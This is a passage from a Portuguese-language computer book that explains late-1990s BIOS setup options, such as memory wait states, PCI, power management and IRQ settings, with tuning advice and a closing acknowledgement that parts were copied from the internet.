• Floppy Disk Acess Control: Essa opção configura se o usuário terá acesso total à unidade de disquete (opção R/W, Read/Write) ou se ele poderá apenas ler disquetes (opção Read Only). Configure em "R/W", a não ser em algum caso particular que você não queira permitir gravação em disquetes.

Terrorismo Tecnológico Aprenda Para Sobreviver

457

• HDD Sequence SCSI/IDE First: Se você tiver um disco rígido IDE e um SCSI instalados ao mesmo tempo no micro, você poderá configurar, através desta opção, qual deles que dará boot. Se você não tiver um disco SCSI, deixe essa opção em "IDE". Caso contrário, ajuste conforme a sua necessidade.

• Assign IRQ for VGA: Essa opção força a placa de vídeo a usar uma linha de interrupção. Se desabilitarmos essa opção, a placa de vídeo não usará uma IRQ, liberando uma interrupção para ser usada para algum outro periférico, o que pode ser conveniente em alguns casos (micros lotados de periféricos gerando conflitos de interrupção com a placa de vídeo). Embora isso possa parecer interessante, os programas DOS (sobretudo jogos) não conseguirão acessar o vídeo com mais de 256 cores se essa opção estiver desabilitada. Por isso, recomendamos que você deixe essa opção habilitada. Inclusive essa é a solução do caso clássico de você não estar conseguindo configurar mais de 256 cores em seu jogos predileto.

• Init Display First: Se você tiver mais de uma placa de vídeo instalada no micro (para aproveitar o suporte a múltiplos monitores do Windows 98) e uma delas for AGP, você deverá configurar através dessa opção qual placa de vídeo irá inicializar primeiro: a placa AGP ou a placa PCI. Você deve ajustar conforme o seu gosto pessoal. Em micros com vídeo on-board, essa opção serve também para desabilitar o vídeo on-board (instalando-se uma placa de vídeo PCI e configurando essa opção em "PCI"). No caso de você não ter mais de uma placa de vídeo, essa opção é ignorada.

Terrorismo Tecnológico Aprenda Para Sobreviver

458

• BIOS Update: Essa opção habilita o upgrade de BIOS. Existe um vírus famoso, chamado CIH (mais conhecido como Spacefiller ou Chernobyl), que apaga o BIOS. Se essa opção estiver desabilitada, o upgrade de BIOS não é possível, bem como esse vírus não conseguirá apagar o BIOS de seu micro, caso o seu micro seja infectado. Nossa recomendação é que você desabilite essa opção e só a habilite durante o procedimento de upgrade de BIOS (esse procedimento raramente é necessário para a maioria dos usuários).

• Report No FDD For Win95: Habilite essa opção somente se você não tiver nenhuma unidade de disquete instalada no micro. Normalmente essa opção deve ficar desabilitada.

• Delay for HDD: Discos rígidos muito antigos demoram um tempo para atingirem a sua velocidade de rotação. O sintoma mais comum desse problema é você ligar o micro e aparecer a mensagem de erro "HDD Controller Failure", mas, dando um reset, o micro passa a funcionar perfeitamente. Isso ocorre justamente porque, da primeira vez que o micro tentou dar o boot, o disco ainda não tinha atingido a sua velocidade de rotação correta, fazendo com que fosse apresentada uma mensagem de erro. Se isto estiver ocorrendo, você pode configurar um tempo de espera (em segundos) que será dado após a contagem de memória para ser dado o início da leitura do disco rígido. Como esse problema só ocorre em discos rígidos antigos, deixe essa opção desabilitada (ou em "0").

• S.M.A.R.T. For Hard Disks: Habilita o modo SMART (Self-Monitoring, Analysis and Reporting Technology) do disco rígido, caso ele possua essa tecnologia (todos os discos rígidos novos tem). Trata-se de um diagnóstico interno

Terrorismo Tecnológico Aprenda Para Sobreviver

459

preventivo que é executado pelo disco rígido que informa ao micro caso o disco rígido tenha alguma possibilidade de se danificar no futuro, dando tempo do usuário fazer backup de seus dados antes de uma "catástrofe" acontecer. Recomendamos que você habilite essa opção.

• Graphics Aperture Size: As placas de vídeo AGP podem usam a memória RAM do micro para armazenarem informações de z-buffering e de texturas. Essa opção define até quanto de memória RAM essas placas de vídeo podem usar para si. Em geral você pode deixar essa opção configurada em seu valor default, mas você pode experimentar mudar o valor caso esteja encontrando erros em jogos 3D.

• CPU Level 2 Cache ECC Checking: Processadores Intel a partir do Pentium II-300 permitem que seja usado um modo avançado de correção de erros no acesso à sua memória cache L2, chamado ECC (Error Correction Check). Esse método de acesso aumenta a confiabilidade dos dados. Embora possa parecer interessante habilitar essa opção, ela diminui o desempenho do micro, já que o processador gastará mais tempo no armazenamento e na leitura de dados do cache de memória, por conta dessa verificação de erros. Portanto, nossa sugestão é que você desabilite essa opção.

• System BIOS Cacheable ou System ROM Cacheable ou System BIOS Shadow Cacheable: Essa opção habilita o uso do cache de memória no acesso ao BIOS do micro. Como o BIOS é acessado o tempo todo e como o uso do cache de memória aumenta o desempenho do micro, essa opção faz

Terrorismo Tecnológico Aprenda Para Sobreviver

460

com que o desempenho do micro aumente. Por isso recomendamos que essa opção seja habilitada.

• Video BIOS Cacheable ou Video Cacheable Option ou Video ROM Cache: Essa opção faz o mesmo que a opção anterior, só que para a memória ROM localizada na placa de vídeo. Recomendamos que essa opção seja habilitada, para que o desempenho de vídeo seja aumentado.

Essas foram as principais configurações existentes no setup avançado (Advanced CMOS setup). A seguir iremos ver as principais opções existentes no setup avançado do chipset (Advanced Chipset Setup). A maioria das opções desse menu dizem respeito a configuração do acesso à memória RAM. Por isso, tome muito cuidado ao alterar alguma opção, pois uma configuração mal feita pode fazer com que o micro fique travando. Caso o micro passe a travar após você ter habilitado alguma opção, basta reiniciar o micro e desfazer as alterações efetuadas no setup para que o micro volte a funcionar normalmente. Muito embora algumas vezes iremos sugerir habilitar algumas opções, pode ser que o seu micro não suporte essa opção habilitada (ele ficará travando).

• Memory Parity Error Check: Habilita o teste de paridade. Como a maioria das memórias hoje em dia não possuem chip de paridade, recomendamos que essa opção seja desabilitada, para que você não obtenha a mensagem de erro de paridade aleatoriamente.

• DRAM ECC/Parity Select: Seleciona qual será o método de correção de erros empregado no acesso à memória RAM:

Terrorismo Tecnológico Aprenda Para Sobreviver

461

ECC ou paridade. O método ECC só poderá ser selecionado caso você tenha uma memória RAM do tipo ECC, que é minoria em nosso mercado e é mais vendida para servidores de rede. A não ser que o seu micro tenha memória ECC instalada (o que achamos pouco provável), configure essa opção em "Parity".

• ECC Checking/Generation: Habilita o esquema ECC de correção de erros. Só habilite essa opção caso o seu micro tenha memória RAM com suporte a esse método de correção de erros (que, como dissemos, achamos improvável).

• Run OS/2 >= 64 MB ou OS Select for DRAM > 64 MB: Caso você use o sistema operacional OS/2, você deverá habilitar essa opção para acessar mais de 64 MB de memória RAM. Como a maioria dos usuários usa Windows 9x, desabilite essa opção (ou coloque em "Non-OS/2").

• Fast EDO Path Select: Habilite essa opção caso a memória de seu micro seja do tipo EDO.

A maioria das configurações do setup avançado do chipset (Advanced Chipset Setup) fica presa a uma configuração padrão e normalmente você só pode alterar essas configurações caso você desabilite a opção Auto Configuration ou Auto Config existente. Isso ocorre porque as configurações desse menu normalmente envolvem base de tempo, e toda configuração dessa natureza faz com que o micro trave caso você configure um valor errado.

Terrorismo Tecnológico Aprenda Para Sobreviver

462

Dessa forma, se você não quiser correr riscos, o melhor a fazer é habilitar a configuração automática e não mexer nas configurações que ficam truncadas por essa opção.

Dentre as inúmeras opções envolvendo base de tempo estão as configurações de wait states. Wait states são pulsos de clock adicionados ao ciclo de leitura ou escrita em memória de modo a casar a velocidade do processador com a velocidade da memória RAM, pois a memória RAM é bem mais lenta que o processador. Durante os pulsos de wait state o processador não faz absolutamente nada, ele fica somente esperando a memória RAM ficar pronta para receber ou enviar os dados. Ou seja, o uso de wait state faz com que o desempenho do micro diminua. Acontece que não há como o processador acessar diretamente a memória RAM sem o uso de wait states.

Dessa forma, quanto menos wait states o processador usar, melhor. Isso significa que você pode tentar diminuir a quantidade de wait states para ganhar um pouco mais de desempenho em seu micro. A configuração automática (Auto Config) não coloca os melhores valores de wait states, mas sim os valores que com certeza não farão com que o micro trave. Por isso, há a chance de você diminuir o número de wait states e o micro não travar.

Se você decidir por diminuir os wait states, desabilite a opção Auto Config e diminua o número usado por cada opção, uma de cada vez. Por exemplo, imagine que a opção CAS Read Wait State esteja configurada em "4" (ou seja, usando 4 wait states). Você pode diminuir esse valor para 3, salvar as alterações e tentar usar o micro um pouco para ver se ele não trava. Se travar, você deve reiniciar o micro, entrar no setup e desfazer a última alteração feita. Caso o micro não trave, você pode tentar diminuir ainda mais esse número, repetindo todo o processo até achar o valor ideal (que é sempre um antes do micro travar).

Só não experimente mudar um monte de opções ao mesmo tempo, pois caso o micro trave você não saberá qual opção você mudou que está fazendo com que o micro trave. O ajuste fino de wait states

Terrorismo Tecnológico Aprenda Para Sobreviver

463

deve ser feito individualmente para cada opção existente. É um processo demorado, mas que, como dissemos, pode render um desempenho extra para o micro.

Se você não tem paciência para fazer esse ajuste fino ou não tem o tempo necessário para fazê-lo, não se preocupe: baste habilitar a opção Auto Configuration e esqueça essa história de ajuste de wait states.

As principais opções de ajuste de wait states são as seguintes:

• Cas Read Wait State ou DRAM Read Wait States: Número de wait states usado na leitura da memória RAM.

• CAS Write Wait State ou DRAM Write Wait States ou DRAM Wait State Select ou DRAM Write CAS Pulse: Idem para a escrita em memória.

• Memory Wait State ou DRAM Wait State: Alguns setups apresentam somente uma única opção para o ajuste de wait states.

• DRAM Speed Option: Em alguns setups o número de wait states não aparece de forma numérica, mas sim através de rótulos: Fastest (0 wait state), Faster (1 wait state), Slower (2 wait states) e Slowest (3 wait states). Através dessa opção você ajusta o número de wait states da mesma forma que nas outras opções apresentadas. Por exemplo, configurá-la em "Faster" é equivalente a configurá-la com 1 wait state.

Terrorismo Tecnológico Aprenda Para Sobreviver

464

Em geral, opções que tenham a ver com base de tempo devem ser configuradas da mesma maneira do que wait states. Isto é, quanto menor o tempo, maior o desempenho. Mas, para isso, você deve achar o valor exato da configuração, conforme explicamos na semana passada. As seguintes opções podem ser configuradas da mesma forma que wait states:

• RAS to CAS Delay ou Fast RAS to CAS Delay: Define quantos pulsos de clock existirão entre os sinais de RAS e CAS, responsáveis pelo acesso à memória RAM.

• DRAM RAS Precharge Time: Número de pulsos de clock necessários para que o sinal RAS (responsável pelo acesso à memória) acumule carga antes de um ciclo de refresh (ciclo que consiste em varrer a memória para recarregar os valores nela armazenados).

• DRAM R/W Leadoff Timing: Número de pulsos de clock necessários antes do início de um ciclo de leitura ou escrita em memória.

A seguir veremos outras opções comuns de serem encontradas no setup avançado do chipset.

• DRAM Speed: Configure com o tempo de acesso das memórias instaladas no micro.

Terrorismo Tecnológico Aprenda Para Sobreviver

465

• DRAM Speculative Leadoff: O chipset da placa-mãe pode especular qual será o próximo endereço a ser lido pelo processador, aumentando o desempenho do acesso à memória RAM. Recomendamos que você habilite esta opção.

• Turn-around Insertion: Insere um wait state nos acessos a dois dados consecutivos na memória. Desabilite esta opção para eliminar este wait state e, com isso, aumentar o desempenho do micro.

• Read-around Write: Se um dado for lido de um endereço recém-escrito na memória RAM, o controlador de memória (que está embutido no chipset da placa-mãe) poderá entregar esse dado ao processador sem a necessidade de lê-lo da memória, já que ele ainda estará armazenado internamente no chipset. Habilite essa opção para ganhar desempenho.

• I/O Recovery Time ou AT Cycle Wait State ou AT Cycle Between I/O Cycles ou 8 Bit I/O Recovery Time ou 16 Bit I/O Recovery Time: Configura wait states para serem utilizados no acesso a dispositivos instalados no barramento ISA. Como o uso de wait states piora o desempenho, recomendamos desabilitar essas opções (ou seja, configurá-las em 0 wait states) ou, se não for possível, configurar o uso de apenas um wait state.

Terrorismo Tecnológico Aprenda Para Sobreviver

466

• ISA Line Buffer: Habilita um buffer de dados para o barramento ISA, aumentando o seu desempenho. Recomendamos, portanto, que você habilite esta opção.

• Memory Hole ou Memory Hole At 15 MB Add: Cria um “buraco” na área de memória entre 15 MB e 16 MB, para que o micro fique compatível com algumas placas de vídeo ISA antigas que usavam essa área para si. Como essa opção faz com que o micro perca 1 MB de memória, sugerimos que você mantenha ela desabilitada.

As opções a seguir aumentam o desempenho do micro quando habilitadas, por isso recomendamos que você as habilite. Mas nem todos os micros são 100% compatíveis com essas opções e, com isso, o micro pode travar depois de você ter habilitado alguma dessas opções. Se isso ocorrer, basta desabilitar a opção que está gerando o problema.

• CPU Burst Write ou CPU-to-Memory Burst Write: Aumenta o desempenho de escrita na memória RAM.

• PCI Bursting ou Host-to-PCI Burst Write ou PCI Burst Mode ou PCI Burst Write Combine ou PCI Dynamic Bursting: Aumenta o desempenho do barramento PCI, habilitando o seu modo burst.

Terrorismo Tecnológico Aprenda Para Sobreviver

467

• PCI Concurrency ou Peer Concurrency: Permite que o barramento PCI atenda a mais de um dispositivo PCI por vez, aumentando o desempenho.

• PCI Streaming: Permite a transferência de pacotes de dados maiores, aumentando o desempenho do barramento PCI.

• PCI-to-DRAM Pipeline: Aumenta o desempenho de escrita de dados feita pelo barramento PCI na memória RAM.

• CPU-to-PCI Write Post ou CPU-to-PCI Write Buffer: Habilita uma memória (chamada buffer) para o armazenamento temporário dos dados enviados pelo processador ao barramento PCI, caso o barramento não esteja pronto para receber dados, liberando o processador para a realização de outra tarefa. Caso essa opção não seja habilitada, o processador terá de esperar o barramento ficar pronto para receber dados, diminuindo o desempenho de escrita no barramento PCI.

• PCI Master 0 WS Write: Permite que dispositivos PCI escrevam na memória RAM sem usar wait states.

• Passive Release: Aumenta o desempenho do barramento PCI.

Terrorismo Tecnológico Aprenda Para Sobreviver

468

Vamos ver mais algumas opções presentes no setup avançado:

• PCI IRQ Activate By: Configura se as interrupções do barramento PCI serão ativadas pelo flanco (edge) ou nível (level) do sinal do pedido de interrupção. Nossa sugestão é que você configure em "level".

• Delay Transaction ou PCI 2.1 Support: Compatibiliza o chipset da placa-mãe com a especificação PCI 2.1. Recomendamos habilitar.

• AT Bus Clock ou AT Clock Selection ou Bus Clock Frequency Select ou ISA Bus Clock Option ou AR Bus Clock Control ou PCICLK-to-ISA Sysclk Divisor: Essa opção configura o clock que será utilizado pelo barramento ISA, que deve funcionar a 8 MHz. Acontece que a maioria das placas-mãe não possuem um gerador de clock de 8 MHz, e daí, para gerarem esse clock, usam um divisor ou do clock do barramento externo do processador (Bus Clock ou Sysclock) ou do clock do barramento PCI (PCICLK). Como o clock do barramento PCI é de 33 MHz, normalmente devemos configurar essa opção em "1/4 PCICLK" (que configurará o clock do barramento ISA em 8,25 MHz). Você mesmo poderá fazer as contas para saber a melhor configuração para essa opção. Lembramos que dispositivos ISA normalmente não conseguem trabalhar muito acima de 8 MHz. Portanto, se você configurar essa opção para um clock mais alto - por exemplo 11 MHz - os dispositivos ISA de seu micro provavelmente não funcionarão.

Terrorismo Tecnológico Aprenda Para Sobreviver

469

Agora que nós já vimos as opções mais importantes do setup avançado (Advanced CMOS Setup e Advanced Chipset Setup), iremos ver a configuração do gerenciamento de consumo elétrico avançado do micro (Advanced Power Management), que é feita através do menu Power Management (ou equivalente) do setup.

O micro possui diversos modos de "hibernação". Nesses modos de hibernação, o micro consome menos eletricidade. Isso é conseguido de diversas formas, como, por exemplo, diminuindo o clock do processador ou desligando o disco rígido. É claro que o micro só entra em modo de hibernação depois de estar um determinado tempo ocioso, isto é, sem fazer absolutamente nada. É justamente na configuração do gerenciamento do consumo elétrico do micro que você configura o tempo de ociosidade necessário para que o micro entre em modo de hibernação.

Existem três modos de hibernação: Doze, Standby e Suspend. A diferença entre eles é a "profundidade" da hibernação. Quanto mais profundo for o "sono" do micro, mais você economizará energia. O modo Doze é o mais superficial e o Suspend, o mais profundo.

No setup você configura o tempo de ociosidade necessário para o micro entrar nesses modos de hibernação. Fora isso você configura quanto tempo de ociosidade é necessário para que o disco rígido seja desligado (opção IDE Power Control ou HDD Power Down Time) ou ainda configura para que a ventoinha do processador seja desligada quando ele entrar em modo Suspend (opção CPU Fan Off). Como o clock do processador é reduzido quando ele entra neste modo, a ventoinha pode ser desligada, já que o processador não esquentará tanto.

Você também pode configurar o tipo de atividade que "acordará" o micro. Um bom exemplo é o modem. Muita gente usa o modem como fax e deixa o micro ligado durante o dia esperando ligações de fax. Para economizar energia, você pode configurar o micro a entrar em modo de hibernação e acordar automaticamente quando o micro receber alguma ligação de fax, voltando a entrar em modo de

Terrorismo Tecnológico Aprenda Para Sobreviver

470

hibernação depois de um período de ociosidade. Esse recurso é chamado Wake-up On Ring.

Na maioria dos setups há uma configuração de que pedido de interrupção (IRQ) acordará o micro. Isto significa que se houver alguma atividade no dispositivo que estiver usando aquela IRQ, o micro acordará. Por exemplo, o teclado usa a interrupção 1 (IRQ1). Com isso, se você configurar que a IRQ1 acordará o micro, significa dizer que o teclado acordará o micro. O mesmo ocorre para todos os demais dispositivos conectados ao micro, como, por exemplo, o mouse serial, que normalmente usa a IRQ4 (ou seja, configurando a IRQ4 para acordar o micro, o micro sairá do modo de hibernação quando você mexer no mouse). Você pode obter uma lista completa de quais interrupções são usadas pelos dispositivos de seu micro através de Gerenciador de Dispositivos (ícone Sistema do Painel de Controle), selecionando Computador e clicando na caixa Propriedades.

Com o gerenciamento de consumo elétrico habilitado no setup, o Windows 9x passa a ter mais uma opção no menu Iniciar: Suspender. Essa opção coloca o micro imediatamente em modo Suspend, não sendo necessário esperar o tempo de ociosidade programado no setup.

É claro que em seu micro poderão existir inúmeras outras funções no menu de configuração do gerenciamento de consumo elétrico, mas entendendo o que explicamos hoje, você saberá configurá-las intuitivamente.

No setup existe um menu para a configuração do barramento PCI e dos dispositivos ISA Plug and Play, normalmente chamado PCI/Plug and Play Setup. A correta configuração desse menu é importante para que não existam conflitos de interrupção ou DMA em seu micro, especialmente se você tiver algum periférico antigo instalado, como, por exemplo, uma placa de som.

Normalmente quando dois ou mais periféricos estão configurados a usar um mesmo recurso, eles não funcionam corretamente. Quando

Terrorismo Tecnológico Aprenda Para Sobreviver

471

dois dispositivos Plug and Play são instalados usando um mesmo recurso (uma mesma linha de interrupção ou canal de DMA), o próprio sistema operacional pode reconfigurar automaticamente os dispositivos, de modo a resolver o conflito de recursos.

Dispositivos ISA antigos não são Plug and Play e, com isso, não há como alterar suas configurações por software, isto é, através do sistema operacional (nesse tipo de periférico a configuração é normalmente feita através de jumpers). Se um dispositivo Plug and Play "cismar" em usar uma mesma interrupção ou canal de DMA que um periférico antigo não Plug and Play, pode ser que o sistema não consiga gerenciar esse conflito, fazendo com que os periféricos entrem em conflito e não funcionem.

Por isso, no setup do micro há como definir manualmente quais linhas de interrupção (IRQ) e quais canais de DMA estão sendo usados por dispositivos antigos não Plug and Play. Assim, esses recursos são separados pelo sistema e nenhum dispositivo Plug and Play poderá utilizá-los.

Se tiver qualquer dispositivo antigo não plug and play instalado em seu micro – como, por exemplo, uma placa de som ou fax modem – você deve efetuar esse procedimento. Placas de som normalmente usam a IRQ5, o DMA1 e o DMA5, enquanto placas de fax modem normalmente usam a IRQ3.

A configuração é feita através de opções como "IRQ x Available To" e "DMA x Available To". Existem duas possibilidades de configuração: "PCI/PnP", caso o recurso esteja sendo utilizado por um dispositivo PCI ou ISA Plug and Play, ou então "ISA/EISA" (ou "Legacy ISA"), caso o recurso esteja sendo usado por um dispositivo não Plug and Play.

Por exemplo, se você tiver uma placa de som antiga no micro, provavelmente deverá configurar "IRQ5 Available To", "DMA1 Available To" e "DMA5 Available To" em "Legacy ISA", enquanto as demais opções deverão ficar em "PCI/PnP".

Terrorismo Tecnológico Aprenda Para Sobreviver

472

Caso você não tenha placas antigas instaladas em seu micro, você pode simplesmente configurar a opção "Resources Controlled By" em "Auto", para informar que todos os periféricos de seu micro são Plug and Play. No caso de existir ao menos uma placa antiga, não Plug and Play, instalada em seu micro, você deverá deixar essa opção em "Manual" e efetuar a configuração que descrevemos.

A opção "PnP OS Installed" existente nesse menu deve ser habilitada caso você esteja usando o Windows 9x.

Hoje veremos o menu Peripheral Setup (ou Integrated Peripherals), que configura todos os periféricos que estão integrados na placa-mãe (isto é, on-board), incluindo as portas seriais, porta paralela, portas IDE e controladora de unidade de disquete.

As opções mais comumente encontradas nesse menu são:

• On Chip VGA: Habilita o vídeo on-board, caso a sua placa-mãe possua esse recurso. Caso você queira desabilitar o vídeo on-board para instalar uma placa de vídeo em um dos slots do micro, basta desabilitar essa opção.

• On Board VGA Memory Size ou VGA Shared Memory Size: Em micros com vídeo on-board que usam a arquitetura UMA (Unified Memory Architecture, Arquitetura Unificada de Memória) o chipset da placa-mãe usa parte da memória RAM como memória de vídeo. Nessa opção você especifica o quanto de memória RAM será utilizado para vídeo. Quanto mais você especificar, pior, pois mais memória você perderá para o uso de aplicações. A quantidade ideal depende da resolução que você for trabalhar no Windows. Recomendamos a seguinte configuração: 640x480, 1 MB; 800x600, 2 MB; 1.024x768 ou 1.280x1.024, 4 MB. Por exemplo, é besteira configurar o micro a usar 4 MB de

Terrorismo Tecnológico Aprenda Para Sobreviver

473

memória de vídeo se a resolução usada for 640x480, pois essa resolução não usa mais do que 1 MB de memória de vídeo. Com isso, você perderá 3 MB de memória à toa.

• On Board Sound: Habilita o áudio on-board, caso a sua placa-mãe possua. Desabilite essa opção caso você queira instalar uma placa de som avulsa em um dos slots do micro.

• Programming Mode: Se você configurar essa opção em "auto", o setup configurará automaticamente as demais opções existentes neste menu. Já em "manual", você poderá configurar manualmente as opções existentes.

• On Board FDC: Habilita a controladora de unidade de disquetes (deixar habilitado).

• FDD AB Exchange Function ou Swap Floppy Drive: Troca logicamente a unidade A com a B. Deixe essa opção desabilitada.

• Serial Port 1: Configura a porta serial 1. Deixe em "Auto" ou "COM1" ou "3F8".

• Serial Port 2: Configura a porta serial 2. Se você tem um fax modem instalado no micro usando o endereço COM2, você deverá desabilitar a porta serial 2 da placa-mãe para não dar

Terrorismo Tecnológico Aprenda Para Sobreviver

474

conflito, o que é feito através dessa opção. Se não for esse o caso, deixe em "Auto" ou "COM2" ou "2F8".

• Serial Port 1 MIDI Support: Habilita a compatibilidade da porta serial 1 com a interface MIDI. Deixar desabilitado.

• Serial Port 2 MIDI Support: Idem.

• rallel Port: Configura a porta paralela do micro. Deixe em "Auto" ou "LPT1" ou "378".

• Parallel Port Mode: Configura o modo de operação da porta paralela, normal ("Normal" ou "SPP") ou bidirecional ("Extended" ou "ECP/EPP"). Sugerimos configurar em modo bidirecional.

• Parallel Port Extended Mode: Configura o modo bidirecional que será utilizado pela porta paralela, EPP ou ECP. Sugerimos configurar em modo ECP, que oferece melhor desempenho.

Terrorismo Tecnológico Aprenda Para Sobreviver

475

Como eu já disse durante o livro, muitos textos foram retirados da Internet e esses apesar de conter informações verdadeiras, muitos estavam com o IP falso e sem mencionar o autor. Se você for um deste me mande um e-mail e colocarei o seu nome nas próximas edições.

http://www.leandro-t.cjb.net/ [email protected]